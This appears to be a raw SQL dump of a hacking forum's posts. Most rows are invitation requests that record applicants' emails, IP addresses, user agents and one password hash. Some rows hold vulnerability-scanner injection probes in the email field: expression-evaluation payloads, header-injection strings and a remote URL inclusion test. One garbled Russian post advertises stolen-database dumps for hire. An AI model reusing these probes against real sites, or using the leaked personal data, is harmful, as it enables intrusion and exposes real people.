'[SIZE=\'4\'][COLOR=\'Sienna\']testme[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1488228\n[b]e-mail[/b]: test@microsoft.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.109.138.42\n[*][b]real ip[/b]: 77.109.138.42\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://testme.fi | testme.fi \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1689, 1507, 0, 'Invite', 2, '{$name}', 1408453722, '[SIZE=\'4\'][COLOR=\'Sienna\']Becks[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: becks@exploit.im\n[b]e-mail[/b]: be.cks@mail.ru\n[b]Info[/b]: Coding C++, VB.NET (only for gui-stuff)\r\nWebhacking (SQLi, XSS, RFI, LFI etc.)\r\nServer Management (Windows, Linux (Debian))\r\nIn the scene for about 10 years.\r\n\r\nBest regards\r\nBecks\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.73.6.205\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Becks : lebedev84@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://becks.de | becks.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1690, 1508, 0, 'Invite', 2, '{$name}', 1408456493, '[SIZE=\'4\'][COLOR=\'Sienna\']dsad[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Emaildasdas@dasdas.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 54.185.68.128\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/dsad | https://twitter.com/hashtag/dsad \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1691, 1509, 0, 'Invite', 2, '{$name}', 1408465225, '[SIZE=\'4\'][COLOR=\'Sienna\']Tetram[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: tetram@zauris.ru\n[b]e-mail[/b]: 7c00h@bk.ru\n[b]Info[/b]: Hey guys, Tetram reporting in.\r\n\r\nI am an embedded systems engineer, interested in low-level stuff.\r\nMy home is the usermode on windows systems, but I am scratching at the gates, if I find the time I will break through :) (but ofc. I know whats going on inside windows)\r\n\r\nSometimes I am innovative, but I also like analyzing and rebuilding code I found in samples.\r\n\r\nMain languages are C and (F)ASM, but also known to Java (will go into android dev soon).\r\n\r\nHm I have a few small projects running just for me atm., one is the rewriting of the ntdll/wow64 layer so I can produce runnable code regardless of the architecture. syscalls and \"heavensgate\" included.\r\n\r\n\r\nI registered here to see some interesting discussions and maybe meet some people with the same mindset.\r\nSadly I currently can\'t speak a single word Russian, but I will put some effort in this. As it seems the only people sharing the same passion as I came from there. (And secretly I love russia :p)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.221.161.234\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tetram.cz | tetram.cz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1692, 1510, 0, 'Invite', 2, '{$name}', 1408471519, '[SIZE=\'4\'][COLOR=\'Sienna\']Trigger[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: trigger@inbox.im\n[b]e-mail[/b]: trigger@inbox.im\n[b]Info[/b]: I want to learn about computers and security\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.59.103.153\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://trigger.io | trigger.io \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1694, 1511, 0, 'Invite', 2, '{$name}', 1408478104, '[SIZE=\'4\'][COLOR=\'Sienna\']BX1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: bodi.crazy1@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.110.142.76\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1695, 1512, 0, 'Invite', 2, '{$name}', 1408481017, '[SIZE=\'4\'][COLOR=\'Sienna\']Dark.Dragon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dar.dragon@jabbim.cz\n[b]e-mail[/b]: red.dragon.alpha@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.144.191.253\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/darkdragon | https://twitter.com/hashtag/darkdragon \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1696, 1513, 0, 'Invite', 2, '{$name}', 1408483706, '[SIZE=\'4\'][COLOR=\'Sienna\']blackman07[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: scriptkid92@jabber.org\n[b]e-mail[/b]: jadeix92@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.203.67.130\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.flickr.com/photos/dannhann/425281634/ | http://www.flickr.com/photos/dannhann/425281634/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1698, 1515, 0, 'Invite', 2, '{$name}', 1408491481, '[SIZE=\'4\'][COLOR=\'Sienna\']hoobie[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: maltivera@hackyard.net\n[b]e-mail[/b]: punkrocker11@operamail.com\n[b]Info[/b]: https://hackyard.net/forum/member.php?u=940\r\nhttps://trojanforge.co/member.php/77-whatsahoober\r\nhttps://exploit.in/forum/index.php?showuser=52011\r\nhttp://i25c62nvu4cgeqyz.onion/profile.php?id=255\r\n\r\nAchievements: software tester/developer\r\n\r\nknowledge: lua, perl, php, javascript, java applets, html, css, regex, reversing and analyzing malware.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 216.164.19.30\n[*][b]real ip[/b]: 216.164.19.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; Windows NT 6.3; I; WOW64; IA64; en) AppleWebKit/599.0+ (KHTML, like Gecko) Chrome/38.0.2066.0 Maxthon/3.9 QupZilla/1.6.6\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://hoobie.net | hoobie.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1714, 1530, 0, 'Invite', 2, '{$name}', 1408519994, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: \nns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1715, 1531, 0, 'Invite', 2, '{$name}', 1408520005, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: hTTp://r87.com/n\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1713, 1529, 0, 'Invite', 2, '{$name}', 1408519987, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1701, 1518, 0, 'opium', 24, 'принимаю заказы на слив бд', 1408500220, '[B]ÞñÑÂ÷ðтõûьýыõ уÑÂûþòøÑÂ:[/B]\n[LIST]\n[*]цõýð ò÷ûþüð þт 1000$\n[*] õÑÂûø ñð÷ы ûøúòøôýыõ (ôðтøýó, фðрüð, ôöþñ ø Ñ‚.ô.), тþ цõýýøú рðÑÂтõт ѠрþÑÂтþü þñъõüð. ÃÂþ ò ûюñþü ÑÂûучðõ ôþóþòþрøüÑÂÑÂ.\n[/LIST]\n [COLOR=\"green\"]ÞñрðщðтьÑÂѠò ôöðññõр: [email]kapitoshka@xakepy.ru[/email][/COLOR]\n\n[B]áþтруôýøчõÑÂтòþ:[/B]\n[LIST]\n[*]ÕÑÂûø òы øüõõтõ ñðó øûø уüõõтõ ñыÑÂтрþ ýðхþôøть ø üýþóþ, ÿþûь÷þòðтьÑÂÑ ÑÂþфтþü\n[*] ÃÂõ üþöõтõ рðÑÂúрутøть øûø \"ôþñøть\" ò ôðýýþü úþýúрõтýþü ÑÂûучðõ,\n[/LIST] тðú öõ - þñрðщðùтõÑÂÑŒ. Ãâ€Ã¾Ã³Ã¾Ã²Ã¾Ñ€Ã¸Ã¼ÑÂѠþ ÑÂþтруôýøчõÑÂтòõ.\n\n[COLOR=\"green\"] ôöðññõр: [email]kapitoshka@xakepy.ru[/email][/COLOR]', 1, 0, '', 4, 1, 0, 0, 0), (1712, 1528, 0, 'Invite', 2, '{$name}', 1408519981, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: http://example.com/?\r\nns: netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1711, 1527, 0, 'Invite', 2, '{$name}', 1408519970, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: \r\nns:netsparker056650=vuln\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1710, 1526, 0, 'Invite', 2, '{$name}', 1408519960, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: #{28274*28274-(13)}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1709, 1525, 0, 'Invite', 2, '{$name}', 1408519942, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ${28275*28275-(13)}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.173.12.30\n[*][b]real ip[/b]: 46.173.12.30\n[*][b]User agent[/b]: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Netsparker)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1707, 1083, 1597, 'kx00', 6, '', 1408507998, 'ßрøòõт Ñøр рðô чтþ ты Ѡýðüø. \r\nÒþÿрþÑÂ. Úтþ ýøть ÿþхõúðû [url]http://toranoana.jp?[/url]', 1, 1, '', 0, 1, 0, 0, 0), (1708, 1524, 0, 'Invite', 2, '{$name}', 1408516070, '[SIZE=\'4\'][COLOR=\'Sienna\']lolfdsf[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qcffvds@live.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 114.150.218.7\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/F464\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : 